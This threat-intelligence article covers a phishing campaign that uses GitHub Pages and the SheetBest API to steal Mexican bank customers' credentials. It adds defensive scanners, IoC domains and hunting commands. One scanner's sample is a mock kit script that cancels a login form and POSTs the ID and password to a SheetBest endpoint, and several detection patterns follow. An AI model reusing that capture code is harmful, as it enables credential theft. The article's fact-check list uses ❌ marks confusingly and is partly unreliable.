🌐 Introduction: When Trusted Platforms Become Attack Vectors
What happens when one of the world’s most trusted developer ecosystems turns into a stealth delivery system for cybercrime? That question is no longer theoretical. A long-running and highly sophisticated phishing campaign has been uncovered, leveraging GitHub Pages and modern serverless architecture to target at least 12 financial institutions in Mexico.
Instead of relying on traditional malicious servers, attackers have quietly built a distributed, modular ecosystem that blends into legitimate infrastructure. The result is a phishing operation that is harder to detect, harder to shut down, and far more scalable than conventional attacks.
🧠 Executive Summary: A 3-Year Silent Digital Infiltration
Researchers have revealed a phishing campaign active for nearly three years, operating with alarming precision. At its core, the attackers abuse GitHub Pages for hosting fake banking portals while using the SheetBest API as a real-time credential exfiltration bridge into Google Sheets.
Instead of deploying malware or centralized command-and-control servers, the attackers rely on serverless infrastructure. This design removes traditional “choke points” that security teams usually depend on for detection and takedown.
The campaign uses:
Over 100 malicious domains
Modular phishing templates
Real-time credential harvesting
Messaging app distribution vectors like WhatsApp, Telegram, and iMessage
🧩 The Architecture: A Fully Serverless Cybercrime Machine
The most striking feature of this campaign is its architecture. Traditional phishing operations depend on dedicated servers that can be traced and dismantled. This one does not.
Instead, attackers abuse three legitimate services:
GitHub Pages for hosting cloned banking portals
SheetBest API for data relay
Google Sheets as the final storage backend
Every component is legitimate. Every component is widely used. And together, they form a nearly invisible attack chain.
By avoiding infrastructure ownership, attackers eliminate one of the strongest tools defenders rely on: server takedown.
🏦 Targeting Financial Institutions in Mexico
The campaign is not random. It targets at least 12 financial institutions in Mexico. Each phishing page is customized to replicate the real bank's login flow, including:
Customer IDs
Password authentication
Card verification data
Victims are guided through realistic interfaces designed to mirror legitimate banking portals down to layout, branding, and flow logic.
The psychological precision is just as important as the technical sophistication.
🔐 Credential Theft Flow: Silent, Instant, Invisible
Once a victim enters sensitive data, nothing is submitted to a traditional server. Instead, malicious JavaScript running inside the browser intercepts the form submission.
The process:
Victim enters credentials
JavaScript stops normal form submission
Data is captured instantly in the browser
POST request is sent to SheetBest API
Data is stored in attacker-controlled Google Sheets
Because no attacker-owned server is involved, there are no attacker-side access logs to seize, no server disk image to examine, and the only records of the exfiltration sit with the relay API and Google, which minimizes the forensic evidence available to responders.
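The capture pattern described above can be triaged statically once a kit's script has been recovered from a repository or a page. The following is an added example, not code from the original report or from the campaign itself: a small Node.js heuristic scanner that flags the combination of a submit handler that cancels the normal form post, a POST to a host other than the page's own, and a known relay host. The kit snippet, the benign counterpart, and the `api.sheetbest.com` hostname are constructed for the example (the report names only "SheetBest API").

```javascript
// Added example: static triage of a phishing-kit script for in-browser
// credential capture. Heuristic regexes, not a JavaScript parser.

// Constructed kit snippet modelled on the flow described in the report.
// The SheetBest endpoint hostname and path are assumptions for this example.
const SAMPLE_KIT = `
document.querySelector('#login').addEventListener('submit', async function (e) {
  e.preventDefault();
  const f = new FormData(e.target);
  await fetch('https://api.sheetbest.com/sheets/EXAMPLE-ID', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ user: f.get('cliente'), pass: f.get('clave') })
  });
  window.location.href = '/soporte';
});
`;

// Constructed benign counterpart: a legitimate single-page login also calls
// preventDefault(), but posts back to its own origin.
const SAMPLE_BENIGN = `
form.addEventListener('submit', (e) => {
  e.preventDefault();
  fetch('/api/login', { method: 'POST', body: new FormData(form) });
});
`;

// Relay hosts worth treating as decisive. Only SheetBest is named in the
// report; the exact hostname is an assumption.
const RELAY_HOSTS = ['api.sheetbest.com'];

// Every http(s) URL that appears inside a string literal.
function extractUrls(src) {
  const re = /['"`](https?:\/\/[^'"`\s]+)['"`]/g;
  const out = [];
  let m;
  while ((m = re.exec(src)) !== null) out.push(m[1]);
  return out;
}

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

// pageHost is the host the script was served from (e.g. a github.io
// subdomain) and decides what counts as cross-origin.
function analyzeScript(src, pageHost) {
  const formIntercept =
    /addEventListener\(\s*['"]submit['"]/.test(src) && /preventDefault\(\)/.test(src);
  const hasPost =
    /method\s*:\s*['"]POST['"]/i.test(src) || /\.open\(\s*['"]POST['"]/i.test(src);
  const hosts = [...new Set(extractUrls(src).map(hostOf).filter(Boolean))];
  const external = hosts.filter((h) => h !== pageHost.toLowerCase());
  const relay = external.filter((h) => RELAY_HOSTS.includes(h));
  const crossOriginPost = hasPost && external.length > 0;
  const obfuscation = /\b(atob|eval|unescape|Function)\s*\(/.test(src);

  // Interception alone is normal for single-page apps; interception plus a
  // cross-origin POST is the kit signature; a known relay host is decisive.
  let score = 0;
  if (formIntercept) score += 1;
  if (crossOriginPost) score += 3;
  if (relay.length) score += 5;
  if (obfuscation) score += 1;

  return {
    formIntercept,
    crossOriginPost,
    externalHosts: external,
    relayHosts: relay,
    obfuscation,
    score,
  };
}

console.log(analyzeScript(SAMPLE_KIT, 'soporte-index25.github.io'));
console.log(analyzeScript(SAMPLE_BENIGN, 'soporte-index25.github.io'));
```

The score deliberately gives little weight to `preventDefault()` on its own, since every modern login page does that; what separates the kit is where the data goes, so the cross-origin POST and the relay host carry the verdict.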
📡 Distribution Strategy: Messaging Apps as Infection Channels
Although the initial delivery vector is only partially documented, the indicators point to heavy reliance on social engineering through messaging platforms.
Attack links are distributed via:
SMS messages
Chat applications
Social engineering lures
Because users tend to trust links shared in personal conversations, platforms like WhatsApp and Telegram become highly effective delivery systems.
🧬 Open Graph Manipulation: Making Phishing Look Legitimate
Attackers also abuse Open Graph metadata to add credibility. When a link is shared, the messaging app fetches the page's og: tags and renders a rich preview showing:
Bank logos
Brand names
Familiar visual elements
This makes malicious links appear authentic inside messaging apps like iMessage, increasing click-through rates significantly.
🕳️ Obfuscation and Routing Tricks: Hiding in Plain Sight
To evade detection, attackers use layered routing structures. Victims are first redirected through harmless-looking paths such as:
“/soporte” (support)
“/cancelacion” (cancellation)
Only later are they directed to credential harvesting endpoints.
Additionally:
Scripts are loaded externally with randomized paths
Payloads are not embedded directly in HTML
Code structure changes frequently
This makes static analysis extremely difficult for defenders.
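The Open Graph impersonation and the externally loaded, random-named scripts described in the two sections above can both be pulled out of a fetched page with a few lines of triage code. The following is an added example, not code from the original report: a Node.js function that parses the og: tags, lists scripts served from other hosts, flags random-looking script names, and notes when the og:url lands on one of the lure paths named in the report. The HTML, the "Banco Ejemplo" brand name, and the brand list are constructed; the github.io hostnames are taken from the report's indicators.

```javascript
// Added example: triage of a suspect page's HTML for Open Graph brand
// impersonation, external randomised scripts and lure routing paths.

// Constructed sample page. "Banco Ejemplo" is a made-up brand; the github.io
// hosts are indicators listed in the report.
const SAMPLE_HTML = `
<html><head>
<meta property="og:title" content="Banco Ejemplo - Banca en Linea">
<meta property="og:image" content="https://soporte-index25.github.io/img/logo.png">
<meta property="og:url" content="https://soporte-index25.github.io/soporte">
<script src="https://cdn.jsdelivr.net/npm/jquery@3.7.1/dist/jquery.min.js"></script>
<script src="https://07-soporte.github.io/a/x9k2q7zp.js"></script>
</head><body><form id="login" action="#"></form></body></html>
`;

const LURE_PATHS = ['/soporte', '/cancelacion']; // paths named in the report
const BRANDS = ['banco ejemplo']; // constructed; a real deployment loads the protected brands

// og:* tags as a plain object; attribute order inside the tag does not matter.
function parseOpenGraph(html) {
  const og = {};
  for (const tag of html.match(/<meta\b[^>]*>/gi) || []) {
    const prop = /property=["']og:([\w:]+)["']/i.exec(tag);
    const content = /content=["']([^"']*)["']/i.exec(tag);
    if (prop && content) og[prop[1]] = content[1];
  }
  return og;
}

// Scripts whose host differs from the page host (relative srcs resolve to pageHost).
function externalScripts(html, pageHost) {
  const out = [];
  for (const tag of html.match(/<script\b[^>]*\bsrc=["'][^"']+["'][^>]*>/gi) || []) {
    const src = /src=["']([^"']+)["']/i.exec(tag)[1];
    let u;
    try { u = new URL(src, `https://${pageHost}/`); } catch { continue; }
    if (u.hostname.toLowerCase() !== pageHost.toLowerCase()) {
      out.push({ host: u.hostname, path: u.pathname });
    }
  }
  return out;
}

// A script name that is a single run of 8+ letters and digits mixing both
// (x9k2q7zp.js) rather than a recognisable library name (jquery.min.js).
function looksRandom(path) {
  const base = path.split('/').pop().replace(/\.m?js$/i, '');
  return /^[a-z0-9]{8,}$/i.test(base) && /\d/.test(base) && /[a-z]/i.test(base);
}

function triagePage(html, pageHost, brands = BRANDS) {
  const og = parseOpenGraph(html);
  const title = (og.title || '').toLowerCase();
  const brand = brands.find((b) => title.includes(b)) || null;
  // A bank brand in the preview while the page lives on a shared hosting
  // platform is the mismatch the messaging-app preview hides from the victim.
  const onSharedPlatform = /\.github\.io$/i.test(pageHost);
  const scripts = externalScripts(html, pageHost);
  let lurePath = null;
  if (og.url) {
    try {
      const p = new URL(og.url).pathname;
      if (LURE_PATHS.includes(p)) lurePath = p;
    } catch {}
  }
  return {
    og,
    brand,
    brandImpersonation: Boolean(brand) && onSharedPlatform,
    externalScripts: scripts,
    randomScripts: scripts.filter((s) => looksRandom(s.path)),
    lurePath,
  };
}

console.log(JSON.stringify(triagePage(SAMPLE_HTML, 'soporte-index25.github.io'), null, 2));
```

Run against a live page, the interesting signal is the combination: a bank name in og:title, a github.io host, and a second github.io host serving a script whose name changes between visits is exactly the layered structure the section describes.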
🧨 Why This Campaign Is So Dangerous
This operation represents a shift in cybercrime strategy:
No servers to shut down
No malware binary to collect and reverse engineer; the only payload is JavaScript that rotates frequently
No fixed infrastructure footprint
Continuous rotation of hosting repositories
It is phishing evolved into a cloud-native attack model.
📊 Indicators of Compromise (IoCs)
soporte-index25.github[.]io
soporte-index09.github[.]io
sntdr-soporte25.github[.]io
07-soporte.github[.]io
These indicators represent only a fraction of the distributed infrastructure.
🧠 What Undercode Say:
Serverless phishing sharply reduces attacker operational risk and brings the marginal cost per deployment close to zero
Abuse of GitHub Pages is rising as trust in developer platforms grows
Financial phishing now mimics full application flows, not static pages
Credential interception happens entirely in the browser, so many endpoint protections never see it
Sheet-based exfiltration through a legitimate API removes the need for attacker-run command-and-control servers
No attacker-owned backend means no attacker-owned logs and a minimal forensic trail
Modular kits enable rapid replication across institutions and continuous evolution of the pages
Messaging apps are now primary phishing delivery vectors, and trust in chat platforms amplifies the lure
Open Graph abuse turns shared links into visual deception tools
Path masquerading (/soporte, /cancelacion) mimics customer-support flows, and multi-stage routing reduces forensic visibility
Externally loaded, frequently rotated scripts defeat signature-based detection
Distributed hosting across many repositories adds redundancy and prevents mass takedown
Attribution becomes harder without centralized endpoints
Phishing is evolving into "software-as-a-service crime" built on legitimate APIs rather than custom infrastructure
The banking sector remains a high-value target, and credential reuse multiplies the exposure
Fake pages are indistinguishable from real ones without deep inspection
Threat intelligence must track infrastructure-less campaigns, and defensive response windows are shrinking
Detection must shift toward behavioral signals: form interception, cross-origin POSTs, and traffic to relay APIs
❌ Claim that GitHub is “inherently insecure” is misleading — the platform itself is not compromised; misuse is the issue
✅ Serverless phishing via legitimate APIs is a documented and growing cybercrime trend
✅ Messaging apps like WhatsApp and Telegram are widely used for phishing distribution campaigns
❌ "At least 12" is a lower bound from the published report; the confirmed target list may vary by report scope
✅ Browser-based credential interception using JavaScript is a known phishing technique
❌ SheetBest API is not malicious by design; it is being abused as a neutral data relay tool
🔮 Prediction:
(+1) Future Evolution of Serverless Phishing
Attackers will likely expand this model into fully automated phishing-as-a-service platforms, combining AI-generated pages with real-time personalization. Expect tighter integration with cloud APIs and more abuse of legitimate developer ecosystems. 🌐📈
(-1) Defensive Challenges Intensify
Security teams will struggle more as infrastructure disappears entirely from traditional detection surfaces. Without servers to track, incident response will depend heavily on behavioral analytics and browser-level protection. ⚠️🛡️
🧪 Deep Analysis:
Inspect cloned repositories for login forms
grep -Rl "<form" ./phishing-repos/
Detect obfuscated JavaScript payloads
find . -name "*.js" -print0 | xargs -0 grep -niE "atob|eval|unescape|Function\("
Analyze network exfiltration patterns. The HTTPS body is encrypted, so grepping packet payloads for "sheetbest" finds nothing; watch DNS resolution of the relay host instead
tcpdump -i eth0 -nn -l port 53 | grep -i "sheetbest"
Monitor browser-side credential capture. Tracing the browser process shows only encrypted socket writes; place the browser behind an intercepting proxy whose CA it trusts and filter for POSTs to the relay (mitmproxy shown here as the substitute tool)
mitmdump --listen-port 8080 "~m POST & ~d sheetbest"
Identify lure routing paths in web or proxy logs
grep -E "/soporte|/cancelacion" access.log
Extract Open Graph metadata from a suspect page
curl -sL https://target-site | grep -oiE '<meta[^>]+property="og:(title|image|url)"[^>]*>'
Track API-based exfiltration endpoints in harvested scripts
grep -RniE "method\s*:\s*['\"]POST" ./scripts | grep -i "api"
Hunt for mass-deployed Pages repositories by naming pattern (hasPages marks repositories that publish a github.io site)
gh search repos soporte --limit 100 --json fullName,hasPages,url
Audit JavaScript for dynamic code execution
npx eslint . --rule 'no-eval: warn' --rule 'no-implied-eval: warn'
Resolve a suspected Pages host. Every github.io site answers from GitHub's shared address space, so the IP alone does not distinguish the campaign from legitimate sites
dig +short A suspicious-domain.github.io
References:
Reported By: cyberpress.org